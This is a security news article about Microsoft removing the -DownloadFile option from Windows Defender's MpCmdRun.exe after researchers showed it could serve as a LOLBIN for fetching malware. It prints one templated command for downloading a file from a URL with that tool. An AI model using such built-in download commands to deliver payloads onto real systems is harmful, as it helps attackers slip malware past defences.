Сlarity and Trust – We take pride in being the site where you can feel free to express your opinion and leave feedback. Whenever you click on the websites of products reviewed by us, we participate in the revenue sharing and get commissions that help us maintain our project. Read more about how we work.

Microsoft removed the file download command in Windows Defender Antivirus

Now Reading
Microsoft removed the file download command in Windows Defender Antivirus

Microsoft removed the ability to download files using Windows Defender after demonstrating how attackers can use this functionality to deliver malware to a computer.

We reported some time ago how Microsoft, for unclear reasons, covertly added the ability to download files using Microsoft Defender.

Following this, the cybersecurity research community expressed concern that Microsoft now allows Windows 10 antivirus to be used as LOLBINs (legitimate OS files that can be used for malicious purposes).

“With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers”, – wrote BleepingComputer journalists.

To download files, users can use the antivirus service command line utility (MpCmdRun.exe) with the -DownloadFile argument, for example:

MpCmdRun.exe -DownloadFile -url [URL] -path [path to save file]

In BleepingComputer’s tests, the specialists were able to download any files, including ransomware, to the systems.

download function in Windows Defender

If Windows Defender is active, it will quickly detect the threat, but other antivirus software can ignore the download.

Answering an official request from BleepingComputer, Microsoft refused to explain why the functionality was added at all.

On September 17, Microsoft updated the antimalware client to version 4.18.2009.2-0 and again changed the functionality of the MpCmdRun.exe utility.

This time the company removed the ability to download files using the command line tool MpCmdRun.exe.

Users who try to download the file using MpCmdRun.exe will receive an error:

CmdTool: Invalid command line argument

download function in Windows Defender

The -DownloadFile command has now been removed from the utility help screen.

Cybercriminals could use all the tools available to them to their advantage, especially those that could be resolved automatically, such as Windows binaries.

LOLBIN attacks are quite real.

“For example, LOLBINs were used by the TA505 team to carry out attacks using ransomware and other types of malware”, – said information security experts.

The removal of the boot option from Windows Defender is good news, as attackers have no additional opportunity to compromise user systems.

What's your reaction?
Love It
Like It
Want It
Had It
Hated It
About The Author
Vladimir Krasnogolovy
Leave a response

Leave a Response